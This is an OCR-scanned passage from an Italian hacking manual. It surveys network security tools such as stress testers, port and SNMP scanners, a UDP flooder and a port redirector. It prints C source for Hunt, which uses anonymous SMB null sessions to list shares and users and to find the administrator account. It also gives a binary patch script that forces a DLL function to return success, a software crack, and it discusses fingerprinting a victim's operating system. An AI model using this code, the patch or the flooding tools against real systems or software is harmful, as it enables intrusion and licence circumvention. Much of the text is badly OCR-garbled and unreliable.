/nr = turns off recv after initial connect (useful for HTTP GET) 

/trial = prints the buffer about to be sent w/o sending it 

/b beginning text = begin the test stream with this byte series 

/e ending text = end the test stream with this byte series 

/np no ping = do not ping first - default on 

/? = Help 

*NOTICE - Blast is a small, quick stress test tool for prof admins* 
*Foundstone, Inc. assumes no liability for use/misuse of this tool* 
See http://www.foundstone.com for updates/ fixes 

Ad esempio : 

blast 1 34.1 34.1 34.4 1 1 0 600 680 lì 7000 /d 300 /b user 

blast 134.134.134.4 110 600 680 /t 7000 /d 300 /b user le endchars 

blast 134.134.134.4 1 10 600 680 /noret 

Altri esempi presenti nella nuova versione sono : 

Blasting di un WEB server 

blast 134 .134 .134 .4 80 40 50 /b "GET /some" /e "uri/ HTTP/1.0" /nr /dr /v 
sends 

'GET /some****************url/ HTTP/ 1.0' capped by dual LF/CR's 
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blast 134 .134 .134 .4 80 25 30 /b "GET /some" /nr /dr 
sends 

'GET /soicie************** ' capped by dual LF/CR's 

blast 134 .134 .134 .4 110 15 20 /b "user te" /e "d" /v 
sends 

'user te*****d' capped by a LF/CR 

blast 134.134.134.4 110 15 20 /b "user te" /e "d" /v /noret 
sends 

'user te*******d' 
/dr looks llke 

Sendlng ' GET/someNNNNNNNNNNNNNNNNNNNNNNNNNurl 



default wlth one LF/CR looks llke 

Sendlng ' GET/someNNNNNNNNNNNNNNNNNNNNNNNNNurl 



BOPING rappresenta la successiva utility della raccolta e come dice il nome è di fatto un 
ginger relativo a BO. 



Back Orifìce Pinger 2.00 IP: 127.0.0.1 



127.0.0.1 




127.0.0.1 


31337 







Start IP address 

End IP address 

UDP port nurnber 

Max run duration (secs) 

W Don't send to locai broadcast addresses ( K 255) 
r~ Show transmit errors 

W Auto-send warning message upon detection 

min max 
Speed (pkts/sec) i 



Modem ->- Cable ~>~ T1 ->- LAN 




Current IP 

Packets sent 0 

Secondi elapsed 0 

□ rifices detected 0 



Stop 



Il programma esegue uno scan entro il range di IP specificati nella maschera. 

Il file che segue invece è distribuito in formato sorgente e il suo nome è CARBONITE. 

Lo scopo è quello di processare la directory Unix /proc relativa alle informazioni legate al file 

system. 
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Quello che segue è un esempio di output del programma. 



CURRENT LOCAL TIME: 03-20-01 17:16:23 



PID 


H? 


VID STAT 


COMM START TIME 


(Jiffies) 








1736 


N 


OR 


(running) 


insmod 0 Days 


ago 


at 


17 


16. 


23 


(3255763) 


0 


N 


OR 


(runnìng) 


swapper 0 Days 


ago 


at 


08 


13. 


46 


(0) 




1 


N 


OS 


(sleeping) 


init 0 Days 


ago 


at 


08 


13. 


46 


(33) 




2 


N 


OS 


(sleeping) 


kflushd 0 Days 


ago 


at 


08 


13. 


46 


(33) 




3 


N 


OS 


(sleeping) 


kupdate 0 Days 


ago 


at 


08 


13. 


46 


(33) 




4 


N 


OS 


(sleeping) 


kpi od 0 Days 


ago 


at 


08 


13. 


46 


(33) 




5 


N 


OS 


(sleeping) 


kswapd 0 Days 


ago 


at 


08 


13. 


46 


(33) 




e 


N 


OS 


(sleeping) 


mdrecoveryd 


0 Days 


ago at 08:13:52 


(606) 


279 


N 


1 S 


(sleeping) 


portmap 0 Days 


ago 


at 


08 


14. 


08 


(2250) 




294 


N 


0 S 


(sleeping) 


lockd 0 Days 


ago 


at 


08 


14. 


08 


(2256) 




295 


N 


OS 


(sleeping) 


rpciod 0 Days 


ago 


at 


08 


14. 


08 


(2256) 




304 


N 


0 S 


(sleeping) 


rpc . statd 


0 Days 


ago at 08:14:08 


(2259) 


318 


N 


OS 


(sleeping) 


apmd 0 Days 


ago 


at 


08 


14. 


08 


(2295) 




369 


N 


OS 


(sleeping) 


syslogd 0 Days 


ago 


at 


08 


14. 


09 


(2321) 




378 


N 


OR 


(running) 


klogd 0 Days 


ago 


at 


08 


14. 


09 


(2334) 




392 


N 


99 S 


(sleeping) 


identd 0 Days 


ago 


at 


08 


14. 


09 


(2392) 




395 


N 


99 R 


(running) 


identd 0 Days 


ago 


at 


08 


14. 


10 


(2407) 




396 


N 


99 S 


(sleeping) 


identd 0 Days 


ago 


at 


08 


14. 


10 


(2407) 




398 


N 


99 S 


(sleeping) 


identd 0 Days 


ago 


at 


08 


14. 


10 


(2409) 




399 


N 


99 S 


(sleeping) 


identd 0 Days 


ago 


at 


08 


14. 


10 


(2409) 




410 


N 


0 S 


(sleeping) 


atd 0 Days 


ago 


at 


08 


14. 


10 


(2422) 




424 


N 


OS 


(sleeping) 


crond 0 Days 


ago 


at 


08 


14. 


10 


(2437) 




439 


N 


OS 


(sleeping) 


cardmgr 0 Days 


ago 


at 


08 


14. 


11 


(2535) 




453 


N 


OS 


(sleeping) 


lpd 0 Days 


ago 


at 


08 


14. 


11 


(2564) 




505 


N 


OS 


(sleeping) 


sendmail 


0 Days 


ago at 08:14:13 


(2742) 


542 


N 


OS 


(sleeping) 


pump 0 Days 


ago 


at 


08 


14. 


13 


(2764) 




545 


N 


OR 


(running) 


gpm 0 Days 


ago 


at 


08 


14. 


13 


(2772) 




584 


N 


43 S 


(sleeping) 


xfs 0 Days 


ago 


at 


08 


14. 


14 


(2870) 




619 


N 


OS 


(sleeping) 


login 0 Days 


ago 


at 


08 


14. 


16 


(3037) 




620 


N 


OS 


(sleeping) 


mingetty 


0 Days 


ago at 08:14:16 


(3037) 


621 


N 


OS 


(sleeping) 


mingetty 


0 Days 


ago at 08:14:16 


(3037) 


622 


N 


OS 


(sleeping) 


mingetty 


0 Days 


ago at 08:14:16 


(3037) 


623 


N 


OS 


(sleeping) 


mingetty 


0 Days 


ago at 08:14:16 


(3037) 


624 


N 


OS 


(sleeping) 


mingetty 


0 Days 


ago at 08:14:16 


(3037) 


657 


N 


500 S 


(sleeping) 


csh 0 Days 


ago 


at 


08 


15. 


30 


(10461) 




680 


N 


500 S 


(sleeping) 


xinit 0 Days 


ago 


at 


08 


15. 


35 


(10960) 





**** 

PID: 1736 
COMMAND: insmod 
ARGS: insmod 
carbonite . o 



ENV: LESSOPEN= I /usr/bin/lesspipe . sh %s 

HOSTNAME=mikebarry 

LOGNAME=mbarry 

MAIL=/var/ spool/mail/mbarry 

MACHTYPE=i386 

TERM=xterm 

HOSTTYPE=i386-linux 

PATH=/usr/ sbin : /sbin : / usr/local/bin : /bin : / usr/bin : / usr/Xl lR6/bin 

KDEDIR=/usr 

HOME=/root 

INPUTRC=/etc/inputrc 

SHELL=/bin/bash 

USER=mbarry 

VENDOR=intel 

GROUP=mbarry 

QTDIR=/usr/lib/qt-2 .1.0 

DISPLAY=:0.0 

LANG=en_ US 

HOST=mikebarry 

OSTYPE=linux 

WIND0WID=3 7748750 

PWD=/home/mbarry/ carbonite 

SHLVL=7 

LS_COLORS=no=00 : fi=00 : di=01 ; 34 : ln=01; 36:pi=40; 33 : so=01;35 :bd=40; 33; 01 : cd=40; 33; 01 : or=0 
1 ; 05; 37; 41 :mi=01 ; 05; 3 7; 41 : ex=01 ; 32:*. cmd=01 ; 32:*. exe=01 ; 32:*. com=01 ; 32:*. btm=01 ;32:*.b 
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pm=01 ; 31:*. cpio=01 ; 31:*. jpg=01 ; 35:*. gif =01 ; 35:*. bmp=01 ; 35:*. xbm=01 ; 35:*. xpm=01 ; 35:*. pn 
g=01 ; 35:*. tif=01 ; 35 : 
=/ sbin/ insmod 

FILES: 
0: /2 
inode number: 4 
1: /2 
inode number: 4 
2: /2 
inode number: 4 

3 : /home/mbarry/carbonite/carbonite . o 

inode number: 66099 

**** 



Il tutto è stato troncato per non fare diventare eccessivamente lungo il capitolo, anche se in 
ogni caso la quantità di informazioni fornite sono molte di più. 

Il programma DDOSPING, come dice il nome, è uno scanner orientato al'individuazione dei 
più comuni programmi per Distributed Denial of Service. 



DDoSPing 2.00 IP: 127.0.0.1 



-Target IP address range 



Start IP address 
End IP address 



127.0.0.1 




Transmission speed control 

min 




Speed (pkts/'sec) 



Uj 



25 



Infected Hosts 



max 



Modem ->- Cable -->-- TI > LAN 



J 1 



■ Status - 



Current IP 
Packets sent 
Time elapsed 
Zombies detected 



127.0.0.1 

0 

0 

0 



Save List 



Configuration 



Feitndstene /ne. http: //www. fourrdsferre. cem 



Anche in questo caso il range di IP sui quali eseguire lo scan è settabile all'interno della 
maschera. 

Un programma molto utile per il monitoraggio dei cambiamenti legati a file di sistema è 
FILEWATCH. 

In questo programma è possibile settare il nome del file da controllare e anche il programma 
da lanciare o il suono da suonare se le dimensioni sono cambiate. 

Il programma come abbiamo detto potrebbe essere utile per controllare se un determinato file 
ha subito delle modifiche. 

Il tutto dispone anche di un LOG mediante il quale è possibile tenere uno storico delle 
modifiche. 
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FileWatch 1.00 



■File to monitor- 



- Audio- 



Jnjxj 



f Monitor file size changes 
(* Monitor file writes 



Browse | 




Run- 



|~~ Run program on file change 



Browse | 



— Display Options — 
W Minirnize on Start 
|7 Hide when minimized 
W Maxinnize when file changes 



Start 



Stop 



FPIPE invece è un redirettore di porte che viene lanciato da linea di comando. 



c:\ Temp>fpipe 

FPipe v2 . 1 - TCP/UDP port redlrector. 
Copyright 2000 (c) by Foundstone , Inc. 
http : //www. foundstone . coiti 

FPipe [-hvu?] [-lrs <port>] [-i IP] IP 



-?/-h 


- shows this help text 


-c 


— maximum allowed simultaneous TCP connections . De fault is 32 


-i 


- listening interface IP address 


-1 


- listening port number 


-r 


- remote port number 


-s 


- outbound source port number 


-u 


- udp mode 


-v 


- verbose mode 



Example : 

fpipe -1 53 -s 53 -r 80 192.168.1.101 



This would set the program to listen for connections on port 53 and 
when a locai connection is detected a further connection will be 
made to port 80 of the remote machine at 192 .168 .1 .101 with the 
source port for that outbound connection being set to 53 also. 
Data sent to and from the connected machines will be passed through. 



c : \ Temp> 



L'utility Fport elenca le porte aperte TCP e UDP associandole alle applicazioni. 

FSCAN invece è un altro port scanner che si lancia anche questo da prompt di DOS con le 

seguenti opzioni. 
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FScan 


[-abefhqnv?] [-cditz <n>] [-fio <f±le>] [-pu <n> [ , <n>-<n>] ] IP[, IP-IP] 


-?/-h 




shows this help fcexfc 


-a 




ann&n/i t~ o mii~mii~ fi 7^ (n<t&ti in r'on iijnrf - iV>n wii~h — o onf i ) 

Qk/k/Cliu (— \S \-J LI L- L* (-* X -i- .X & I u O C u XJX Uvii / UliL- (— X vii rV _L 1 11 (-* -L Uii / 


-b 




UC L. f-f\-> ±. L. X/ul ii i C=:X O 


-c 




f - 7 man tt^ - f n t** pnnnopf t on a^f - orTinf - c* /me ) 

L. J.illcU UL X UX t— LJI1H fcr (_. L. X CJi CI L. L. KZlllf-> L. O ( iud / 


-d 




Ucl a^y X^CS L. r» tr tri J O LaiJo ( ilio / 


-e 




x eo oi ve xìt dCiureò&eò e o iio&urianies 


-f 




vpi a W TDe ■f min "Filo / nomna f 7 h ] o wì i~h mi^mi'h ~F t~<~}tyi — 0 1 


-i 




X/XiiU 1— y X V di X UL.a X f-s\J ±. L. 


-1 




pOx t USL xxxe cliClCSe li dille J.I1 (jUOLSS X X lt COXlCciXXJS spac&s 


-n 


- 


no port scanning - only plnglng (unless you use —q) 


-o 




mii~mii~ ~Fì 1 & — pnr7o4P npmp 7 n mini" a c 77^ 7 f - nnn1~ a ine: ena /"•o e 

u Lf A— 7 Li L- X X X & d 2 V_> -1^ Lv O & iiuillw Xii W iiv t— X X X. t— L^Vii L>ClXiiw O KsCL L^ O 


~P 




TCP port Cs> to scan Ca comma separated list of ports/ranges) 


-<? 




qulet mode, do not ping host before scan 


-r 




randomlze port order 


-t 




timeout for pings (ms) 


-u 




UDP port (s) to scan (a comma separated list of ports/ranges) 


— v 




verbose mode 


-z 




maximum simultaneous threads to use for scanning 



Il programma HUNT viene distribuito con tanto di sorgenti e viene utilizzato come SMB share 
enumerator. 



//Hunt vl.O - Copyright (c) 1998 by JD Glaser NT OBJECTives 
//SMB share enumerator and admin finder 

******************************************************************** 

* This program is free software; you can redistribute it and/or modify 

* it under the terms of the GNU General Public License as published by 

* the Free Software Foundation; either version 1, or (at your option) 

* any later version. * 

* This program is distributed in the hope that it will be useful, 

* but WITHOUT ANY WARRANTY; without even the implied warranty of 

* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 

* GNU General Public License for more details . * 

* You should have received a copy of the GNU General Public License 

* along with this program; if not, write to the Free Software 

* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. 



^include <windows.h> 
iinclude <lm.h> 
iinclude <stdio.h> 
iinclude <iostream.h> 

void EstablishNullSession (LPCHSTR lpwServer, BOOL bEstablish) ; 
void DoNetUserEnum (const wchar__t* lpwServer) ; 
int Get Admin (char* pServer, char* pUser) ; 
void PrintHelp () ; 

// Vars for enum users 

WCHAR RemoteResource [UNCLEN + 5 + 1] ; // Length of UNC path + IPC$ + NULL 

void wmainfint arge, wchar_t* argv[]) 
{ 

// check if running on Windows NT, if not, display notice and terminate 
if( GetVersion() & 0x80000000 ) 
{ 

printf ("Hunt only runs on Windows NT. . . ") ; 
return; 

} 

if(argc != 2) 
{ 

PrintHelp () ; 
return; 

} 

if((0 == strcmp(argv[l] , "/")) // (0 == stremp (argv [1] , "/"))) 
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PrintHelp () ; 
return; 

} 

EstablishNullSession (argv[ 1 ] , TRUE) ; 
return; 



void EstablishNullSession (LPCWSTR lpwServer, BOOL bEstablish) 
{ 

LPCWSTR IpszIPC = L"\\IPC$"; 
DWORD dwServer; 

DWORD dwError; 

DWORD dwEntriesRead; 

DWORD dwTotalEntries ; 

NET_API_STATUS netStatus; 
USE_INF0_2 userInfo2; 

SHARE_INF0_1* pSharelnfol = NULL; 

int iLoop; 
char sharename [256] ; 
char remark [256] ; 

// do not allow NULL or empty server name 
if (lpwServer == NULL II * lpwServer == L'\0') 
{ 

SetLastError ( ERROR_ INVALID_ COMPUTERNAME ) ; 
return; 

} 

dwServer = lstrlenW (lpwServer) ; 

if (lpwServer [0] !=L'\\' && lpwServer [1] !=L'\\') 
{ 

// prepend slashes and NULL terminate 
RemoteResource [0] = i'W'; 
RemoteResource [1] = L ' \\ ' ; 
Remot eResource [2] = L'\0' ; 

} 

else 
{ 

dwServer —= 2; // remove une slashes 
Remot eResource [0] = L'\0 ' ; 

} 

if (dwServer > CNLEN) 
{ 

SetLastError ( ERROR__ INVALID_ COMPUTERNAME ) ; 
return; 

} 

if (IstrcatW (RemoteResource, lpwServer) == NULL) return; 
if (IstrcatW (RemoteResource, IpszIPC) == NULL) return; 



ZeroMemory (&userInfo2, sizeof (userInfo2) ) ; 
userInfo2.ui2_local = NULL; 

userInfo2 . ui2_remote = (LPTSTR) RemoteResource; 
userInfo2 . ui2_asg_type = USE__IPC; 
userInfo2 . ui2_password = (LPTSTR) L""; 

userInfo2.ui2_username = (LPTSTR) L""; 

userInfo2.ui2_domainname = (LPTSTR) L""; 

netStatus = NetUseAdd (NULL , 2, (LPBYTE) SuserInfo2 , NULL) ; 
dwError = GetLastError () ; 
if ( netStatus != NERR__Success ) 
{ 



if (netStatus == 1219) 
{ 
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; 

netStatus = NetShareEnum (lpwServer , 1, (LPBYTE*) SpSharelnfol, 

MAX_PREFERRED_LENGTH, 
SdwEntriesRead, 
&dwTotalEntries, NULL) ; 

dwError = GetLastError () ; 

if ( netStatus .'= NERR_Success ) 

{ 

printf ("Error = %d\n", netStatus) ; 
} 



for(±Loop=0; ±Loop< (int) dwTotalEntries; iLoop++) 
{ 

// Convert the Unicode full name to ANSI. 

WideCharToMultiByte (CP_ACP , 0, pShareInfol->shil_netname, 



-1, 



NULL, NULL ); 



sharename , 



256, 



-1, 

NULL ) ; 



WideCharToMultiByte (CP_ACP, 0, pShareInfol->shil_remark, 

remark, 256, NULL, 

wprintf (L" share = %S - %S\n" , sharename, remark) ; 
pShare!nfol++; 



// Enum the users 

DoNet UserEnum ( lpwServer) ; 

// Kill the connection 
netStatus = NetUseDel (NULL, (LPTSTR) RemoteResource, 0) ; 



return; 



void DoNetUserEnum (const wchar_t* lpwServer) 
{ 

USER_INFO_10* pBuff, *pCurrInfo; 

DWORD dwRead, dwTotalRemaining , dwResume, dwRetCode, dwLoopCnt, dwServer; 

char user [256]; 

char userServer [256] ; 

int iGotAdmin; 

dwResume = 0; 
dwServer = 0; 
iGotAdmin = 0; 

// Do not allow NULL or empty server name 
if (lpwServer == NULL II *lpwServer == L'\0') 
{ 

SetLastError (ERROR_INVALID_COMPUTERNAME) ; 
return; 



dwServer = lstrlenW (lpwServer) ; 

if (lpwServer [0] !=L'\\' SS lpwServer [1] !=L'\\') 
{ 

// Prepend slashes and NULL terminate 
RemoteResource [0] = L'\\'; 
RemoteResource [1] = L'\\'; 
Remot eResource [2] = L'\0' ; 

} 

else 
{ 

dwServer —= 2; // remove une slashes 
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if (dwServer > CNLEN) 
{ 

SetLastError ( ERROR_ INVALID_ COMP UTERNAME ) ; 
return; 

} 

if (IstrcatW (RemoteResource, lpwServer) == NULL) return; 

do 
l 

pBuff = NULL; 

dwRetCode = NetUserEnum (RemoteResource , 10, 0, (BYTE**) SpBuff, 2048, 

SdwRead, SdwTotalRemaining, SdwResume) ; 
if (dwRetCode != ERROR_MORE_DATA && dwRetCode != ERROR_SUCCESS) 
break; 

for (dwLoopCnt = 0, pCurrlnfo = pBuff; dwLoopCnt < dwRead; ++ 
dwLoopCnt, ++ pCurrlnfo) 
{ 

printf("User = %S", pCurrInfo->usrilO_name) ; 
printf '(" , %S", pCurrInfo->usrilO_full__name) ; 
printf (" , %S", pCurrInfo->usrilO_usr__comment); 
printf (", %S", pCurrInfo->usrilO_comment) ; 

printf ("\n") ; 

// Convert the Unicode full name to ANSI. 

WideCharToMultiByte (CP_ACP, 0, pCurrInfo->usrilO_name, - 

1, 

user, 256, NULL, NULL) ; 
// Convert the Unicode full name to ANSI. 
WideCharToMultiByte (CP_ACP, 0, lpwServer, -1, 

userServer, 256, NULL, NULL); 

if ( ! iGotAdmin) 
{ 

// Cali this function with char strings 
iGotAdmin = GetAdmin (user Server , user); 

) 

} 

if (pBuff != NULL) 

NetApiBufferFree (pBuff) ; 
} while (dwRetCode == ERROR_MORE_DATA) ; 

if (dwRetCode 1= ERROR_SUCCESS) 

printf ("NUE() returned %lu\n", dwRetCode) ; 

} 

int GetAdmin (char* pServer, char* pUser) 
{ 

char szDomainName [256] ; 
SID_NAME_USE use; 
PSID pUserSID; 
DWORD dwSize; 
DWORD dwAdminVal; 
DWORD dwDomainName ; 
int iRetVal; 
int iSubCount; 

// General return code 
dwDomainName = 256; 
dwSize = 0; 

dwAdminVal = 0; 
iSubCount = 0; 

//Query for buffer size 

iRetVal = LookupAccountName (pServer, 

pUser, pUserSID, 
SdwSize, szDomainName, 
S dwDomainName, &use) ; 

iRetVal = GetLastError () ; 

/ /Allocate a larger buffer if error = too small 
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pUserSID = (PSID) malloc (dwSlze) ; 
iRetVal = LookupAccountName (pServer, 

pUser, pUserSID, 
SdwSize, 

szDomainName, 

SdwDomainName , 

Suse) ; 

} 

//Scan the SIDS checking for a match to ADMIN == 500 

ISubCount = (int) * (GetSidSubAuthorityCount (pUserSID) ) ; // address of 

security identlfier to query) ; 

dwAdminVal = * (GetSidSubAuthority (pUserSID, iSubCount-1) ) ; 
i f (dwAdmin Val==500) 
{ 

printf ( "Admin is %s\\%s\n", szDomainName, pUser) ; 
return 1; 

} 

return 0; 

} 

void PrintHelp () 
{ 

printf ("Hunt vi. 2 - Copyright (c) 1998, NT OBJECTives, Inc.\n") ; 

printf ("SMB share enumerator and admin finder \n") ; 

printf ( "Programming by JD Glaser - Ali Rights Reserved\n") ; 

printf ("\tUsage - hunt \ \ \ \servername\n ") ; 

printf ("\t/? = Help\n"); 

printf ("See http://www.ntobjectives.com for updates/fixes") ; 
return; 

} 



NTLAST invece è un analizzatore di file di LOG indirizzato a mostrare l'attività di 
LOGIN/LOGOFF del sistema. 
Le sue opzioni sono : 



Command 


Line Switches 




-s 


Last Successful Logons 




-f 


Last Failed Logons 




-i 


Last Interactive Logons 




-r 


Last Remote Logons 




-u [u] 


Logons by User - (u) = case sensitive username 




-m [m] 


Name of machine to search - (m) = machine name 




-n [n] 


Number of Last Logons - (n) = number of records records 




-from 


[\m] Last logons from - (\m) = upper-case UNC server name 




-c 


Condensed Output - De fault 




-v 


Verbose Output - shows logon/logoff/duration 




-not [u] Filter out User - Case sensitive 




-nuli 


Include nuli sessions - Ignored by default 




-mil 


Military Time Output - Default matches event log time 




-file 


File name - Saved . evt sec log to open 




-csv 


Print output as CSV 




-rt 


Raw date/times in CSV output 




-1 


Last Successful Logon 




-1:1 


Last Interactive Logon 




-l:r 


Last Remote Logon 




-iis 


US 4.0 logons only 




-ad 


Include entries after this date/time - Specify military time 




-bd 


Include entries before this date/time - Specify military 


time 




(Switches -ad and -bd can be combined to get between 


date/tinte (s) ) 






- or / 


Either switch statement can be used 


-? 


Help 





NTOMax è uno stress tool programmabile mediante script. 

L'utility è orientata a mettere sotto stress e quindi ad eseguire dei test i vari servers. 

Le opzioni sono : 
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http example - 



host :x.x.x.x, 80, 40, 50, 1000, 250, 250, 2, true, true, false, false 
le: GET /some*url/ HTTP/1.0 
le: POST /some * uri/ HTTP/1.0 



mail example- 

host .x.x.x.x, 110, 40, 50, 3000, 250, 4000, 1, false, false, true, false 
le: user b*ll 
le: pass te*d 



Usage - ntomax /s < script .txt > results .txt 
/s = reads script from stdin 
/? = Help 



- Script Format - 

host:[ip address] , [port] , [min] , [max] = host parameters 

Additional host parameters in order: 

timeout - ms to wait for socket response - default = 0 

delay - ms to wait he f ore sending - de fault = 250 

pause - ms to wait before receiving - default = 0 

retnum - number of LF/CR's to end buffer - default is one 

reopen - T/F reopen connection before each send - default is off 

nerecv - T/F no receive after intial connect - default is off 

verbose - T/F verbose output- off by deault 

trial - T/F diplay buffer w/o sending 



Command synax: 

c: [command text] = preloop coomands 
le: [command buffer] = loop commands 
c: [command text] = post loop command 
— Script Example - 

host : 12. 12. 12. 2, 80, 400, 500, 5000, 0,0, 2, true, true 

lc:GET /some * uri/ 

le: POST /some * uri/ 

or a mail server example 

host : 12.12.12.2,110,40, 50, 5000, 0,0,1, false, true 
le: user hac*ker 
le .-pass hack*pass 



Things to Know 

First four host params are required, others are optional 

When using optional params, you must specify ali except the last 

Min is the size of buffer to start testing at until Max is reached 

Timeout in milliseconds to wait on socket response - default 0 mi 

Delay in milliseconds before sending commands - default 250 mi 

By default, LF/CR are included. AddRet number defines LF/CR's to add 

- 0 = LF/CR's are not added in loop commands 

- 1 = LF/CR's are added to loop commands only 

- 2 = Doublé LF/CR's are added (Use fui in GET requests) 
There is currently one preloop/ loop /postloop command sequence 
Each section can have multiple commands 

Each command will be sent to the target host in sequence 
The loop commands will be repeated as a whole, max-min times 
Only the loop commands will send arbitrary buffers to the target 
The asterisks is the buffer place holder, spaces are preserved 
For a buffer of 30, your string will expand like this : 
' GET /some * uri/ HTTP/1.0' = 'GET /some NNNN uri/ HTTP/1.0' 
' GET /some*url/ HTTP/1.0' = 'GET / someNNNNNNurl / HTTP/1.0' 
Buffer size of 30 = Twenty-eight characters plus LF/CR 
Buffers with doublé LF/CR's send 26 characters 



Un utility orientata ad eseguire della patch di files binary è PATCHIT. 
Quello che segue è un esempio di PATCH applicabile ad un file binario. 
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Commands and syntax: 

A comment starts with a ' ; ' . Ali text to the end of the line is ignored. 
Ali string values must be enclosed in doublé quotes 
HEX numbers must be preceeded with a "$". 
Commands are not case sensistive . 
Ali whitespace is ignored. 

TITLE <"title"> 

Displays a message when the script is loaded/run. 

Can be placed anywhere within the script . 
MESSAGE < "message "> 

Displays a message during script execution. 
DIR <" directory path"> 

Optional directory path to search for files. 

For compatibility it is advisable not to use specific 

drive names in the path . 
FILE <"filename"> [filesize] 

Filename to patch. Optional filesize speci fies the size 

that the file must match to be accepted. 
FIND <byte> [<*>] . . . 

Performs a search on the current file for the sequence 

of bytes that match <byte> . . . up to max 256. Use the 

keyword * to match any byte. If a match is found then 

the PATCH file position value is set to the file 

position at which the found pattern begins . 
FUNCTION <"funcname"> 

Sets the current patch position to the file position of 

the given exported function name (case sensitive) . It is 

assumed that the file being patched is a DLL. 
PATCH [[POS <file _pos>] / [OFFSET <file__offset>] ] <orig_byte> <new_byte> . . . 

Patches the current file at optional file position/offset . 

Replaces orig_byte with new_byte. Fails if originai byte 

read from file is not orig_byte. 
COPY <"orig_file"> <"new_file"> 

Copies "orig_file" to "new_file" 
DELETE <" filename "> 

Deletes the specified file. 
INIFILE <"filemame"> 

Speci fies an INI file to be used in subsequent INI commands. 

This filename is relative to the last DIR directory path. 
INISECTION <"section"> 

Speci fies an INI section name for use in subsequent INIWRITE 

commands 
INIWRITE <"keyname"> <"value"> 

Writes the given string value to the INI keyname in the 

previously specfied INI file's section. 



TITLE "Patch for NiceApp 8.02" 

DIR "C:\program Files\Nice App" 
FILE "Awcomm32.dll" 129024 

MESSAGE "Using file Awcomm32 . dll . . 

COPY "Awcomm32.dll" "Awcomm32 .bak" 



FIND 












$B8 


* * 


* * 






;mov eax, 0669E716 




$E8 


* * 


* * 






;Call 066A4476 




$81 


$EC 


$BC 


$0E 


$00 $00 


;sub esp, OOOOOEBC 




$53 










;push ebx 




$56 










;push esi 




$57 










;push edi 




$E8 


* * 


* * 






;call 066A0E0F 




$50 










;push eax 




$8D 


$8D 


$2C 


$F7 


$FF $FF 


; lea ecx, dword ptr 


[ebp+FFFFF72C] 


$E8 


* * 


* * 






;call 06696196 




$C7 


$45 


$FC 


$00 


$00 $00 $00 


;mov [ebp-04], 00000000 




$8D 


$8D 


$38 


$F7 


$FF $FF 


; lea ecx, dword ptr 


[ebp+FFFFF7 38 ] 


$E8 


* * 


* * 






;call 066A25BE 




$C6 


$45 


$FC 


$01 




;mov [ebp-04], 01 




$8D 


$8D 


$14 


$F7 


$FF $FF 


; lea ecx, dword ptr 


[ebp+FFFFF714] 
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$C6 $45 


$FC 


$02 


;mov [ebp-04] , 02 


$0F $B7 


$05 


* * * * 


;movzx eax, word ptr [066A9290] 


$85 $C0 






; test eax, eax 


$0F $85 


* * 


* * 


;jne 0669DC6C 


PATCH 








$B8 $6A 






; push 01 


$01 








* $58 






; pop eax 


* $C2 






; ret 0004 


$04 








$E8 $00 










Test script 



Run 



Edit script 



Una piccola utility orientata a mostrare le informazioni legate agli oggetti WINDOWS, usando 
il mirino presente nel programma, è SHOWWIN. 



ShoWin 2.00 



r 




V 





Drag the crosshair to begin 



Copy 



■Mouse pos- 
574 31 G 



Title |sFatic 

Class nanne 
Window handle 
Parent window 
Owner window 
Window ID 
Window proc 
Client coords 
Window coords 

pOptions — 

W Highlight Windows 
V Include invisibles 



Static 

1Z4S630 (nxCi0130J.BE) 
1901082 (0K001D021A) 
0 (0x00000000) 
1004 (0x000003EC) 
0x77D60S43 

x: 149 y: 76 tj: 209 
x: E 12 y: 314 tj: 209 



13 
13 



-Right click on window to... — 
Hide/Show V Close 
I Repaint j Enable/Disable 
V On top V Not on top 



SNSCAN invece è un utility di scannino orientata ad individuare servizi SNMP. 

All'interno del programma è possibile specificare il range degli IP. 

È inoltre possibile specificare la comunità o le porte da utilizzare nello scanning. 
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5 ss&am l,rn - Cniiyrijiii r.F Kimeinc, - l*tji//m™ i w ■. 



- IP *tdreas* lo tan 

Hi] strare/IP 



|lZ7. 


D 


0 


. 1 


| 127 . 


D 


1 


25* 



EndlP }<J 



Hai I 




SrJHF puiti )□ uni 


5HUP commi»» 


tj alrnj 


F 161 r 331 
T193 T1933 











Schi *:nrìh«il 



TrieoU (rvi*) 3U0O 



Pois scanred: QA) 



Un altro scanner è TROUT. 



inguini 



f Bin? b| lì^isr 



-IMKI 



Un programma per inviare pacchetti UDP è invece UDPFIood. 
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-IClMj 




SpBed loUtósc) 



J 



H«*n ->■■■ Cube ->■■■ T1 -->■■■ \Jti 



DJa- 




L'ultimo programma che dispone anche di un software d'installazione è VISION. 

Questo programma mostra le connessione remote relative a qualche attaccante remoto ed 

oltre a visualizzarle vi permette di gestirle distaccando la connessione in tempo reale. 
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I dentif icazione del sistema operativo 

Tra le varie attività che devono essere eseguite quella relativa all'identificazione del sistema 
operativo della macchina vittima è sicuramente quella più importante. 
D'altra parte abbiamo detto che il fatto di riuscire ad entrare in un sistema è in gran parte 
legato all'identificazione di bugs e di caratteristiche del sistema operativo e dei servers che ci 
girano sopra. 

Ma come è possibile identificare l'OS agendo dall'esterno ? 

Partiamo dalle caratteristiche più nascoste ovvero quelle che dovremo cercare di analizzare 
nel caso in cui non sia possibile in modo più semplice avere la risposta che ci interessa. 
Chiaramente dobbiamo pensare che il sistemista potrebbe aver cercato di nasconderlo 
mediante le metodologie proprie dell' OS utilizzato per cui di fatto l'individuazione di questo 
diventa un fatto indiziario. 

Come abbiamo detto precedentemente hackerare un sistema significa prima di tutto 
individuare tutte le caratteristiche di questo per cui non sapendo neppure il sistema operativo 
adottato altre funzioni di analisi potrebbero risultare ancora più complesse da eseguire. 
Dicevamo che spesso si tratta di analizzare degli indizi ovvero delle caratteristiche particolari 
legate a certe configurazioni come ad esempio alcuni modo di creare i pacchetti TCP. 
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Il programma nmap (nmapNT per Windows) utilizza un sistema di analisi che prende in 
considerazione diversi fattori come ad esempio : 

• Test con pacchetto FIN. Generalmente quando si invia un pacchetto FIN su una porta 
aperta, questa non dovrebbe rispondere. Alcuni sistemi come ad esempio Windows 



• Bogus Flag probe. Un flag del TCP non definito viene settato nell'header TCP relativo 
ad un pacchetto SYN. Alcuni sistemi operativi come UNIX rispondono con questo flag 
settato. 

• ISN (Initial Sequenze Number). Ogni implementazione TCP setta questo valore con 
un numero particolare. 



• Monitoraggio "Don't fragment bit" . Alcuni sistemi operativi settano questo flag per 



>pe 



questo flag pe 



Valore ACK. Differenti stack TCP usano valori differenti come numero di sequenza. 
